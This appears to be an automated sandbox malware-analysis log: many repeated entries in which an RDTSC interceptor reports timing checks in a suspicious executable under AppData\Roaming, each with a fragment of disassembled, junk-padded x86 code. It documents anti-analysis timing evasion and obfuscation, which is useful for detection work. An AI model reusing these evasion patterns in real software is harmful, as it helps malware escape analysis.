Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 512E2F second address: 512E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC91259401h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FBC91259409h 0x00000010 popad 0x00000011 jc 00007FBC91259400h 0x00000017 jmp 00007FBC912593FAh 0x0000001c jmp 00007FBC91259409h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pop edi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 512E94 second address: 512E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A832B second address: 5A8331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7141 second address: 5A7148 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55AB19 second address: 53ED24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 stc 0x00000009 mov cl, 43h 0x0000000b lea eax, dword ptr [ebp+1247F8ADh] 0x00000011 xor ch, 00000036h 0x00000014 push eax 0x00000015 jg 00007FBC912593FEh 0x0000001b mov dword ptr [esp], eax 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FBC912593F8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 xor dword ptr [ebp+122D19A9h], edx 0x0000003e call dword ptr [ebp+1244E287h] 0x00000044 pushad 0x00000045 pushad 0x00000046 push esi 0x00000047 pop esi 0x00000048 pushad 0x00000049 popad 0x0000004a jmp 00007FBC91259408h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B0DC second address: 55B11C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBC9118B8AFh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FBC9118B8B4h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 push eax 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FBC9118B8AAh 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B11C second address: 55B168 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jp 00007FBC91259408h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FBC912593F8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edi, esi 0x0000002e push 190BF85Dh 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push edi 0x00000037 pop edi 0x00000038 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B168 second address: 55B16C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B28C second address: 55B2A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259407h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B2A7 second address: 55B2E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBC9118B8B9h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FBC9118B8B0h 0x00000011 xchg eax, esi 0x00000012 or dword ptr [ebp+122D3381h], ebx 0x00000018 nop 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jng 00007FBC9118B8A6h 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B2E8 second address: 55B30D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a jng 00007FBC912593F6h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBC91259402h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B30D second address: 55B311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B40B second address: 55B412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BAEB second address: 55BAFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8AFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BAFE second address: 55BB02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BD12 second address: 55BD3F instructions: 0x00000000 rdtsc 0x00000002 je 00007FBC9118B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1F80h], ebx 0x00000014 mov dword ptr [ebp+122D1D25h], edi 0x0000001a lea eax, dword ptr [ebp+1247F8ADh] 0x00000020 or ecx, dword ptr [ebp+122D3954h] 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a push edx 0x0000002b pop edx 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BD3F second address: 55BD45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BD45 second address: 53F8B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FBC9118B8A8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D2704h] 0x0000002e call dword ptr [ebp+1244B4A1h] 0x00000034 jbe 00007FBC9118B8AAh 0x0000003a push ecx 0x0000003b push eax 0x0000003c pop eax 0x0000003d pop ecx 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FBC9118B8B3h 0x00000046 jmp 00007FBC9118B8ADh 0x0000004b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A755C second address: 5A7573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259403h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A76D1 second address: 5A76D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A76D7 second address: 5A76DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A76DD second address: 5A76E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7857 second address: 5A7872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBC91259403h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7872 second address: 5A7878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7878 second address: 5A7888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FBC91259402h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7888 second address: 5A788E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A788E second address: 5A7892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7892 second address: 5A78A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8B2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A78A8 second address: 5A78AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A78AC second address: 5A78B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7B9C second address: 5A7BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7E46 second address: 5A7E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8AAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA605 second address: 5AA60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA60A second address: 5AA612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA612 second address: 5AA616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA1BF second address: 5AA1C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA1C5 second address: 5AA1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA303 second address: 5AA329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007FBC9118B8B3h 0x0000000a jnc 00007FBC9118B8A6h 0x00000010 pop esi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA329 second address: 5AA32D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA32D second address: 5AA333 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA333 second address: 5AA339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA339 second address: 5AA33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B47A4 second address: 5B47B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBC912593F6h 0x00000009 jo 00007FBC912593F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B3063 second address: 5B3069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B3069 second address: 5B3078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FBC912593F6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B3078 second address: 5B307C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B3364 second address: 5B3373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007FBC912593F6h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B34B7 second address: 5B34BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B34BD second address: 5B34D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B34D6 second address: 5B34DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B3650 second address: 5B3657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B44A9 second address: 5B44AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B8690 second address: 5B86A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBC91259402h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7933 second address: 5B7939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7939 second address: 5B793F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B793F second address: 5B7943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7943 second address: 5B7978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBC91259400h 0x00000010 jmp 00007FBC91259402h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7978 second address: 5B79D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007FBC9118B8C2h 0x0000000f js 00007FBC9118B8A6h 0x00000015 jmp 00007FBC9118B8B6h 0x0000001a jmp 00007FBC9118B8B8h 0x0000001f jp 00007FBC9118B8A8h 0x00000025 jo 00007FBC9118B8B2h 0x0000002b ja 00007FBC9118B8A6h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7D59 second address: 5B7D6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FBC912593FEh 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7D6D second address: 5B7D72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7D72 second address: 5B7D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBC91259402h 0x0000000b jnl 00007FBC912593F6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7D95 second address: 5B7D9F instructions: 0x00000000 rdtsc 0x00000002 js 00007FBC9118B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7D9F second address: 5B7DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FBC912593FEh 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7DB3 second address: 5B7DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7F24 second address: 5B7F41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259404h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5BAFBB second address: 5BAFEE instructions: 0x00000000 rdtsc 0x00000002 js 00007FBC9118B8A6h 0x00000008 jne 00007FBC9118B8A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007FBC9118B8E5h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBC9118B8B9h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5BAFEE second address: 5BAFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0B17 second address: 5C0B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0B1D second address: 5C0B27 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBC912593F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0E81 second address: 5C0E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0E87 second address: 5C0E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0E8D second address: 5C0E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0E93 second address: 5C0EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBC912593FDh 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007FBC912593FFh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0EBC second address: 5C0EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C0EC0 second address: 5C0EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259406h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBC912593FCh 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1211 second address: 5C1215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1810 second address: 5C181B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C181B second address: 5C1821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1821 second address: 5C1842 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBC91259409h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1842 second address: 5C1848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1B63 second address: 5C1B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1B67 second address: 5C1B6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1B6D second address: 5C1B93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FBC91259408h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1B93 second address: 5C1BAD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBC9118B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 jp 00007FBC9118B8A6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1BAD second address: 5C1BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1BB6 second address: 5C1BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
